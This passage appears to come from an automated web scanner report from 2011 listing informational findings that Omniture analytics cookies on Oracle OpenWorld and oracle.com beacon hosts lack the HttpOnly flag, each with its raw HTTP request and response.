HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:15:56 GMT Server: RAS/1.3 (Unix)Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=10; path=/; domain=.rubiconproject.comSet-Cookie: ses15=9844^2&11953^10; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60243; path=/; domain=.rubiconproject.com Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: application/x-javascript Content-Length: 1712 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl); window.rubicon_ad = "3158455" ...[SNIP]...
13.119. http://oracle.112.2o7.net/b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracle.112.2o7.net
Path:
/b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:s_vi=[CS]v1|2733218E05162BCA-60000182E00125F7|cx7Emox60ikx60cnmx60|2733211C85012E40-60000109C00668A7|fx7Bhjeljfd|2733218685011339-40000104A014EEE0[CE]; Expires=Sun, 4 Sep 2016 15:58:25 GMT; Domain=oracle.112.2o7.net; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103?AQB=1&ndh=1&t=6%2F8%2F2011%2015%3A58%3A21%202%20300&ce=UTF-8&ns=oracle&pageName=oow2011%3Aen-us%3A%2Fcontact%2F&g=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fcontact%2Findex.html&r=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html&cc=USD&ch=Oracle%20OpenWorld%3A%202011&c20=D%3Dv20&v20=New&c24=D%3Dv24&v24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html&c26=D%3Dv26&v26=oow2011%3Aen&v36=Oracle%20OpenWorld%3A%202011&c38=D%3DpageName&c39=D%3DpageName&c50=D%3Ds_vi&v50=D%3Ds_vi&c51=ora_code%3A1.37%3AH23.3&h1=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fcontact%2Findex.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: oracle.112.2o7.net Proxy-Connection: keep-alive Referer: http://www.oracle.com/openworld/contact/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi=[CS]v1|2733210E05159EC1-40000176A0000B4C|fx7Bhjeljfd|2733211C85012E40-60000109C00668AA|cx7Emox60ikx60cnmx60|2733211C85012E40-60000109C00668A7|x60x7Dnlcjx60x7Fjaxxx60x7Dck|2733218685011339-40000104A014EEE2[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:58:25 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_fx7Bhjeljfd=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=oracle.112.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=.2o7.net; Path=/Set-Cookie: s_vi=[CS]v1|2733218E05162BCA-60000182E00125F7|cx7Emox60ikx60cnmx60|2733211C85012E40-60000109C00668A7|fx7Bhjeljfd|2733218685011339-40000104A014EEE0[CE]; Expires=Sun, 4 Sep 2016 15:58:25 GMT; Domain=oracle.112.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:58:25 GMT Last-Modified: Wed, 07 Sep 2011 15:58:25 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664321-4785-7DF25DAF" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www415 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.120. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211885011D66-6000010A20474AFC|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ s_vi_fx7Bhjeljfd=[CS]v4|2733211885011D66-6000010A20474AFF|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2733211885011D66-6000010A20474B01|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A25%202%20300&pageName=Search%3A%20OpenWorld%3A%20No%20Results&g=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss%2Bfaq%2Bhelp%2Bcontact%2Bphone&r=http%3A//www.oracle.com/openworld/register/packages/index.html%3Fsrc%3D7013425%26Act%3D226&cc=USD&c5=xss%20faq%20help%20contact%20phone&c20=New&v20=New&v24=http%3A//www.oracle.com/openworld/register/packages/index.html%3Fsrc%3D7013425%26Act%3D226&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:54:25 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211885011D66-6000010A20474AFC|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211885011D66-6000010A20474AFF|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2733211885011D66-6000010A20474B01|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:54:25 GMT Last-Modified: Wed, 07 Sep 2011 15:54:25 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664231-3A57-2150C7DC" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www81 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.121. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|27332187050132C6-400001166006E825|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|273321188501292D-6000010B004C6452|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845?AQB=1&ndh=1&t=6/8/2011%2015%3A58%3A5%202%20300&pageName=Search%3A%20OpenWorld%3A%20No%20Results&g=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss&r=http%3A//www.oracle.com/openworld/tools/mobile/index.html&cc=USD&c5=xss&c20=New&v20=New&c24=no%20value&v24=http%3A//www.oracle.com/openworld/tools/mobile/index.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:58:06 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|27332187050132C6-400001166006E825|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|273321188501292D-6000010B004C6452|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:58:06 GMT Last-Modified: Wed, 07 Sep 2011 15:58:06 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E66430E-6576-4E5300FE" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www179 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.122. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/ s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499?AQB=1&ndh=1&t=6/8/2011%2015%3A56%3A13%202%20300&pageName=Search%3A%20All%3A%20Results&g=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26sear&r=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&cc=USD&c4=sql%20syntax%20help&c6=1&c20=New&v20=New&c24=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26btnSearch%3DSearch&v24=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26btnSearch%3DSearch&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Search%3A%20All%3A%20Results&pidt=1&oid=javascript%3AsearchDuplicateLink%281%2C10%2C482523%29%3B&ot=A&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:56:14 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:56:14 GMT Last-Modified: Wed, 07 Sep 2011 15:56:14 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E66429E-469A-637CA977" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www107 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.123. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/ s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A46%202%20300&pageName=Search%3A%20All%3A%20Results&g=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26sear&r=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&cc=USD&c4=sql%20syntax%20help&c6=1&c20=New&v20=New&c24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&v24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Search%3A%20All%3A%20Query&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:54:47 GMT Server: Omniture DC/2.0.0Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/ Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/ X-C: ms-4.4.1 Expires: Mon, 05 Sep 2011 15:54:47 GMT Last-Modified: Wed, 07 Sep 2011 15:54:47 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache ETag: "4E664247-443F-7E91E57E" Vary: * P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www33 Content-Length: 43 Content-Type: image/gif GIF89a.............!.......,............Q.;
13.124. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://oracleglobal.112.2o7.net
Path:
/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211D05010D53-4000010EC0480BA8|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/ s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A33%202%20300&pageName=Search%3A%20All%3A%20Query&g=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&r=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&cc=USD&c20=New&v20=New&c24=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&v24=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Error%3A404%3Ahttp%3A//www.oracle.com/us/sitemaps/sitemaps.html&pidt=1&oid=functiononclick%28event%29%7Bjavascript%3Adocument.searchForm.keyword.value%3D%27%27%7D&oidt=2&ot=TEXT&AQE=1 HTTP/1.1 Host: oracleglobal.112.2o7.net Proxy-Connection: keep-alive Referer: http://search.oracle.com/search/search?default=true&keyword=phone&start=1&nodeid=&fid=&showSimilarDoc=true&group=All User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|0-0|4E664230[CE]
Response
